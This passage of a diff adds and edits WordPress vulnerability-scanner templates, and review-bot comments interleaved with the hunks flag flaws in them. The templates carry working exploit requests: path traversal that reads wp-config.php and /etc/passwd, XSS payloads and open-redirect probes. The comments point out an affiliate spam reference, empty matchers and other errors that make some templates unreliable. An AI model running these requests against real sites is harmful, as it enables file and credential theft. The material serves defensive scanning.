1.5.9 suffers from a local file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html - https://cxsecurity.com/issue/WLB-2019050123 + - https://woocommerce.com/?aff=1790 + classification: + cwe-id: CWE-98 tags: wordpress,wp-theme,lfi requests: @@ -24,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/05 
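Review bot: The diarise hunk adds `https://woocommerce.com/?aff=1790` as a reference; that is an affiliate-tagged storefront link with no relation to the Diarise advisory the other two references describe, and it should be removed from the template. The new `cwe-id: CWE-98` is also out of step with the rest of this commit, which classifies the same arbitrary-file-retrieval class as `CWE-22` (candidate-application-lfi, cherry-file-download, issuu-panel-lfi). The db-backup-lfi template on this line wraps its `description` plain scalar across two lines; a `>-` block would make that intent explicit.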
diff --git a/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml b/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml new file mode 100644 index 0000000000..f83ef7300e --- /dev/null +++ b/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml @@ -0,0 +1,25 @@ +id: dzs-zoomsounds-listing + +info: + name: WordPress Plugin dzs zoomsounds + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + tags: wordpress,listing,wp-plugin,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/dzs-zoomsounds/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/dzs-zoomsounds" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml b/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml index 84f714c999..de7c8f2d98 100644 --- a/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml +++ b/vulnerabilities/wordpress/easy-media-gallery-pro-listing.yaml @@ -1,4 +1,5 @@ id: easy-media-gallery-pro-listing + info: name: WordPress Plugin Media Gallery Pro Listing author: pussycat0x @@ -6,7 +7,7 @@ info: description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: https://www.exploit-db.com/ghdb/6455 tags: wordpress,listing,wp-plugin - + requests: - method: GET path: diff --git a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml deleted file mode 100644 index 6225458a19..0000000000 --- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml +++ /dev/null 
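Review bot: The dzs-zoomsounds-listing description, `Searches for sensitive directories present in the wordpress-plugins plugin.`, is the same boilerplate as easy-media-gallery-pro-listing on this line and names neither the plugin nor what is detected, and the name `WordPress Plugin dzs zoomsounds` says nothing about the directory listing the matcher checks for. Suggest `name: WordPress Plugin dzs-zoomsounds - Directory Listing` and a description stating that the plugin directory is served with an index of its contents, plus a `reference` entry as the easy-media template has.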
@@ -1,21 +0,0 @@ -id: easy-wp-smtp-listing - -info: - name: SMTP WP Plugin Directory listing enabled - author: PR3R00T - severity: high - description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access. - reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - tags: wordpress,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" - matchers: - - type: word - words: - - "debug" - - "log" - - "Index of" - condition: and diff --git a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml index 4b8b194cfc..376ae78efd 100644 --- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml +++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL. - reference: https://cxsecurity.com/issue/WLB-2020030183 + reference: + - https://cxsecurity.com/issue/WLB-2020030183 tags: wordpress,wp-theme,redirect requests: diff --git a/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml new file mode 100644 index 0000000000..0a91138dfb --- /dev/null +++ b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml 
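Review bot: In the eatery-restaurant hunk the context description, `The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.`, names a different theme from this template's id and appears to be copied from attitude-theme-open-redirect (L888); while the reference directly below it is being restructured, the description should name the Eatery Restaurant theme. The easy-wp-smtp-listing change on this line is a pure deletion.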
@@ -0,0 +1,48 @@ +id: elex-woocommerce-xss + +info: + name: WordPress WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting + author: dhiyaneshDk + severity: high + description: WordPress WooCommerce Google Shopping < 1.2.4 is susceptible to cross-site scripting because the plugin does not sanitize or escape the search GET parameter before outputting it back in the page and + executing it in a logged in admin context. + reference: + - https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: wordpress,wp-plugin,xss,authenticated,woocommerce + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/feedwordpress-xss.yaml b/vulnerabilities/wordpress/feedwordpress-xss.yaml new file mode 100644 index 0000000000..20cc24cc81 --- /dev/null +++ b/vulnerabilities/wordpress/feedwordpress-xss.yaml 
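Review bot: As rendered here the first body matcher is `words: - ""`, an empty string that matches every response, so after login the template only requires `text/html` and a 200 and any admin page would satisfy it; the same empty word appears in my-chatbot-xss (L904) and seo-redirection-xss (L909), and feedwordpress-xss (L898) shows a truncated `'">" method="post">'`. If the reflected markup was lost in page rendering, the committed files should be checked for it; if not, each matcher needs the actual reflected string. Separately, the vector `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N` (7.2) marks UI:N for a reflected XSS that needs a logged-in admin to open a crafted page; the customary reflected-XSS vector has UI:R and scores 6.1, which is also what the `medium` severity on my-chatbot-xss (L904, carrying the identical 7.2 vector) implies.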
@@ -0,0 +1,41 @@ +id: feedwordpress-xss + +info: + name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter. + reference: + - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 + tags: wordpress,wp-plugin,xss,feedwordpress,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">" method="post">' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml index 19cfc73b7b..af1015d333 100644 --- a/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml +++ b/vulnerabilities/wordpress/flow-flow-social-stream-xss.yaml @@ -1,7 +1,7 @@ id: flow-flow-social-stream-xss info: - name: Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Reflected XSS + name: Flow-Flow Social Stream <= 3.0.71 - Cross-Site Scripting author: alph4byt3 severity: medium reference: diff --git a/vulnerabilities/wordpress/hb-audio-lfi.yaml b/vulnerabilities/wordpress/hb-audio-lfi.yaml new file mode 100644 index 0000000000..4a0e7ea744 --- /dev/null +++ b/vulnerabilities/wordpress/hb-audio-lfi.yaml 
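Review bot: The feedwordpress description, `The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.`, does not name the plugin, and unlike the other XSS templates added in this commit there is no `classification` block; suggest `description: FeedWordPress < 2022.0123 is affected by reflected cross-site scripting via the visibility parameter of syndication.php.` and `classification:` with `  cwe-id: CWE-79`. The flow-flow hunk on this line is a name-only change.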
@@ -0,0 +1,29 @@ +id: hb-audio-lfi + +info: + name: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Retrieval + author: dhiyaneshDK + severity: high + reference: + - https://packetstormsecurity.com/files/136340/WordPress-HB-Audio-Gallery-Lite-1.0.0-Arbitrary-File-Download.html + metadata: + google-dork: inurl:/wp-content/plugins/hb-audio-gallery-lite + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/health-check-lfi.yaml b/vulnerabilities/wordpress/health-check-lfi.yaml new file mode 100644 index 0000000000..c6e1a39f3c --- /dev/null +++ b/vulnerabilities/wordpress/health-check-lfi.yaml 
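Review bot: hb-audio-lfi has no `description` and no `classification`, so reports show only the name; a one-sentence description naming `audio-download.php` and its `file_path` parameter, plus `cwe-id: CWE-22` as used elsewhere in this commit, would bring it level with the other new LFI templates. The name also uses `Wordpress` where the rest of this commit writes `WordPress`.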
@@ -0,0 +1,45 @@ +id: health-check-lfi + +info: + name: Health Check & Troubleshooting <= 1.2.3 - Authenticated Path Traversal + author: DhiyaneshDK + severity: high + description: The Health Check & Troubleshooting WordPress plugin was affected by an Authenticated Path Traversal security vulnerability. + remediation: Fixed in version 1.2.4 + reference: + - https://wpscan.com/vulnerability/5eecc4a7-0b44-495d-9352-78dccebfc72a + - https://www.synacktiv.com/ressources/advisories/WordPress_Health_Check_1.2.3_Vulnerabilities.pdf + tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=health-check-view-file-diff&file=../../../../../../etc/passwd + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml b/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml new file mode 100644 index 0000000000..003dee02ce --- /dev/null +++ b/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml 
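Review bot: The login request in the first raw block posts `testcookie=1` but, unlike every other authenticated template in this commit, sends no `Cookie: wordpress_test_cookie=WP%20Cookie%20check` header; WordPress rejects a login form that asserts `testcookie=1` when that cookie is absent, so the second request would run without a session and the template would never match. Add the same `Cookie:` line the elex, feedwordpress and my-chatbot templates use. The second request's query string `action=wprss_fetch_items_row_action` belongs to an unrelated plugin and conflicts with the `action=health-check-view-file-diff` in the body; it only works where PHP's request order lets the POST field override `$_REQUEST`, so drop the query parameter and post to plain `/wp-admin/admin-ajax.php`.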
@@ -0,0 +1,35 @@ +id: hide-security-enhancer-lfi + +info: + name: WordPress Hide Security Enhancer 1.3.9.2 Local File Inclusion + author: dhiyaneshDK + severity: high + description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation. + reference: + - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + remediation: Upgrade to version 1.4 or later. + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/29 diff --git a/vulnerabilities/wordpress/issuu-panel-lfi.yaml b/vulnerabilities/wordpress/issuu-panel-lfi.yaml index d2ecd930f2..46a775efd6 100644 --- a/vulnerabilities/wordpress/issuu-panel-lfi.yaml +++ b/vulnerabilities/wordpress/issuu-panel-lfi.yaml @@ -1,11 +1,17 @@ id: issuu-panel-lfi info: - name: Wordpress Plugin Issuu Panel - RFI & LFI + name: Wordpress Plugin Issuu Panel Remote/Local File Inclusion author: 0x_Akoko severity: high description: The WordPress Issuu Plugin includes an arbitrary file disclosure vulnerability that allows unauthenticated attackers to disclose the content of local and remote files. - reference: https://cxsecurity.com/issue/WLB-2016030131 + reference: + - https://cxsecurity.com/issue/WLB-2016030131 + - https://wordpress.org/plugins/issuu-panel/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: wp-plugin,wordpress,lfi,rfi requests: 
@@ -23,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/29 diff --git a/vulnerabilities/wordpress/mthemeunus-lfi.yaml b/vulnerabilities/wordpress/mthemeunus-lfi.yaml new file mode 100644 index 0000000000..bb1b5770e5 --- /dev/null +++ b/vulnerabilities/wordpress/mthemeunus-lfi.yaml @@ -0,0 +1,29 @@ +id: mthemeunus-lfi + +info: + name: mTheme-Unus Theme - Local File Inclusion (LFI) + author: dhiyaneshDk + severity: high + description: The mTheme-Unus WordPress Theme was affected by a css.php Local File Inclusion security vulnerability. + reference: + - https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb + - https://packetstormsecurity.com/files/133778/ + tags: wordpress,wp-theme,lfi,wordpress,mtheme + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/music-store-open-redirect.yaml b/vulnerabilities/wordpress/music-store-open-redirect.yaml new file mode 100644 index 0000000000..762915a8cd --- /dev/null +++ b/vulnerabilities/wordpress/music-store-open-redirect.yaml 
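Review bot: mthemeunus-lfi lists `wordpress` twice in `tags: wordpress,wp-theme,lfi,wordpress,mtheme`; `tags: wordpress,wp-theme,lfi,mtheme` removes the duplicate. The template also has no `classification` block, unlike the other new LFI templates in this commit that carry `cwe-id: CWE-22`. The issuu-panel hunk on this line only adds the trailing comment.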
@@ -0,0 +1,24 @@ +id: music-store-open-redirect + +info: + name: Music Store <= 1.0.14 - Referer Header Open Redirect + author: dhiyaneshDk + severity: medium + description: The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability. + reference: + - https://wpscan.com/vulnerability/d73f6575-eb86-480c-bde1-f8765870cdd1 + - https://seclists.org/fulldisclosure/2015/Jul/113 + tags: wordpress,redirect,wp-plugin,musicstore,wp + +requests: + - raw: + - | + GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 + Host: {{Hostname}} + Referer: https://example.com + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/vulnerabilities/wordpress/my-chatbot-xss.yaml b/vulnerabilities/wordpress/my-chatbot-xss.yaml new file mode 100644 index 0000000000..adb3a0d840 --- /dev/null +++ b/vulnerabilities/wordpress/my-chatbot-xss.yaml 
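Review bot: music-store-open-redirect has no `classification`, whereas the other open-redirect templates added in this commit (newsletter-open-redirect, pieregister-open-redirect) carry `cwe-id: CWE-601`; add `classification:` with `  cwe-id: CWE-601` so the redirect templates are classified alike. It also has no `matchers-condition` and no status matcher, which is consistent with the other header-regex redirect templates here and fine as is.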
@@ -0,0 +1,47 @@ +id: my-chatbot-xss + +info: + name: WordPress My Chatbot <= 1.1 - Reflected Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: WordPress My Chatbot <= 1.1 is susceptible to cross-site scripting. The plugin does not sanitize or escape its tab parameter in the Settings page before outputting it back in an attribute. + reference: + - https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: wordpress,wp-plugin,xss,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml index eba8ffcbf7..6f1dfbf9fe 100644 --- a/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml +++ b/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml 
@@ -1,11 +1,12 @@ id: nativechurch-wp-theme-lfd info: - name: WordPress NativeChurch Theme Arbitrary File Download + name: WordPress NativeChurch Theme - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: A LFD Bug In download.php File In NativeChurch Theme And Make Site Vulnerable. - reference: https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html + description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system. + reference: + - https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html tags: wordpress,wp-theme,lfi requests: diff --git a/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml new file mode 100644 index 0000000000..2b65920e1e --- /dev/null +++ b/vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml @@ -0,0 +1,24 @@ +id: newsletter-manager-open-redirect + +info: + name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect + author: akincibor + severity: low + description: | + The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 + metadata: + verified: true + tags: wp-plugin,redirect,wordpress,wp,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ==" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 
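Review bot: newsletter-manager-open-redirect.yaml on this line and newsletter-open-redirect.yaml on L906 are both new in this commit, cite the same wpscan advisory `847b3878-da9e-47d6-bc65-3cfd2b3dc1c1` and send the same request to `/?wp_nlm=confirmation&appurl=...`, differing only in the encoded redirect target and in severity (`low` here, `medium` there); one should be dropped so a host is not reported twice with two different severities. If one is kept, the L906 form is preferable: its target decodes to the reserved `example.com` rather than `attacker.com`, a real third-party domain, and it carries `cwe-id: CWE-601`. The nativechurch hunk on this line is a wording change only.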
diff --git a/vulnerabilities/wordpress/newsletter-open-redirect.yaml b/vulnerabilities/wordpress/newsletter-open-redirect.yaml new file mode 100644 index 0000000000..2960aceaa6 --- /dev/null +++ b/vulnerabilities/wordpress/newsletter-open-redirect.yaml @@ -0,0 +1,26 @@ +id: newsletter-open-redirect + +info: + name: WordPress Newsletter Manager < 1.5 - Unauthenticated Open Redirect + author: dhiyaneshDk + severity: medium + description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the + header() PHP function, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 + classification: + cwe-id: CWE-601 + tags: wordpress,redirect,wp-plugin,newsletter,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ==" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + +# Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/ninjaform-open-redirect.yaml b/vulnerabilities/wordpress/ninjaform-open-redirect.yaml new file mode 100644 index 0000000000..3431d9da92 --- /dev/null +++ b/vulnerabilities/wordpress/ninjaform-open-redirect.yaml 
@@ -0,0 +1,35 @@ +id: ninjaform-open-redirect + +info: + name: Ninja Forms < 3.4.34 - Administrator Open Redirect + author: dhiyaneshDk,daffainfo + severity: low + description: The wp_ajax_nf_oauth_connect AJAX action was vulnerable to open redirect due to the use of a user supplied redirect parameter and no protection in place. + reference: + - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818 + tags: wordpress,redirect,wp-plugin,ninjaform,authenticated,wp + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302' + - 'status_code_2 == 302' + - "contains(all_headers_2, 'Location: https://example.com?client_id=1')" + condition: and diff --git a/vulnerabilities/wordpress/pieregister-open-redirect.yaml b/vulnerabilities/wordpress/pieregister-open-redirect.yaml new file mode 100644 index 0000000000..1696507595 --- /dev/null +++ b/vulnerabilities/wordpress/pieregister-open-redirect.yaml 
@@ -0,0 +1,26 @@ +id: pieregister-open-redirect + +info: + name: WordPress Pie Register < 3.7.2.4 - Open Redirect + author: 0x_Akoko + severity: low + description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + reference: + - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 + - https://wordpress.org/plugins/pie-register/ + classification: + cwe-id: CWE-601 + tags: wordpress,redirect,wp-plugin,pieregister + +requests: + - method: GET + path: + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + +# Enhanced by mp on 2022/04/13 diff --git a/vulnerabilities/wordpress/sassy-social-share.yaml b/vulnerabilities/wordpress/sassy-social-share.yaml index e9acae08cf..8d425c291c 100644 --- a/vulnerabilities/wordpress/sassy-social-share.yaml +++ b/vulnerabilities/wordpress/sassy-social-share.yaml @@ -1,11 +1,11 @@ id: sassy-social-share-xss info: - name: Sassy Social Share XSS + name: Sassy Social Share <= 3.3.3 - Cross-Site Scripting author: Random_Robbie severity: medium - description: Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS) - tags: wordpress,wp-plugin + tags: wordpress,wp-plugin,sassy,xss + requests: - method: GET path: @@ -14,13 +14,19 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - '[{"":""}]' - 'facebook' - 'twitter' - part: body condition: and + - type: word + part: header + words: + - 'application/json' + negative: true + - type: status status: - 200 \ No newline at end of file diff --git a/vulnerabilities/wordpress/seo-redirection-xss.yaml b/vulnerabilities/wordpress/seo-redirection-xss.yaml new file mode 100644 index 0000000000..41362a0a81 --- /dev/null +++ b/vulnerabilities/wordpress/seo-redirection-xss.yaml 
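Review bot: The sassy-social-share hunk deletes `description: Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS)` and moves the version into `name`, leaving the template with no description at all; keep a `description:` sentence saying what the plugin reflects unescaped rather than removing the field. The new side still ends with `\ No newline at end of file`, which the edit could have fixed. The pieregister hunk on this line matches `example\.com.*$` on the Location header, a looser pattern than the shared `(?m)^(?:Location\s*?:\s*?)...example\.com\/?(\/|[^.].*)?$` regex used by the other redirect templates; aligning it avoids two behaviours for the same check.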
@@ -0,0 +1,54 @@ +id: seo-redirection-xss + +info: + name: WordPress SEO Redirection < 7.4 - Reflected Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: | + The plugin does not escape the tab parameter before outputting it back in JavaScript code, leading to a Reflected Cross-Site Scripting issue. + remediation: Fixed in version 7.4. + reference: + - https://wpscan.com/vulnerability/b694b9c0-a367-468c-99c2-6ba35bcf21ea + tags: wordpress,xss,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + POST /wp-admin/options-general.php?page=seo-redirection.php&tab=cutom HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + tab=%3C%2Fscript%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E + + - | + GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "settings_page_seo-redirection" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/shortcode-lfi.yaml b/vulnerabilities/wordpress/shortcode-lfi.yaml new file mode 100644 index 0000000000..1bd28a766b --- /dev/null +++ b/vulnerabilities/wordpress/shortcode-lfi.yaml 
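Review bot: The third raw request fetches `/wp-admin/admin.php?page=wpda_duplicate_post_menu`, a page that belongs to a different plugin and is referenced neither by the advisory nor by the `settings_page_seo-redirection` word the matcher expects; it looks like a leftover from another template and should be removed, or if it is meant as the reflection step its `page` value has to be the SEO Redirection settings page. The second request sends `tab` both in the query string (`tab=cutom`, which reads like a typo for `custom`) and in the body, so which value the plugin reflects is unclear from the template itself. Unlike the other new XSS templates there is no `classification` block; `cwe-id: CWE-79` would match them.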
@@ -0,0 +1,31 @@ +id: shortcode-lfi + +info: + name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3) + author: dhiyaneshDK + severity: high + description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain + sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected. + reference: + - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html + metadata: + google-dork: inurl:wp/wp-content/force-download.php + tags: wordpress,wp-plugin,lfi,shortcode,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml b/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml new file mode 100644 index 0000000000..a58df73c46 --- /dev/null +++ b/vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml 
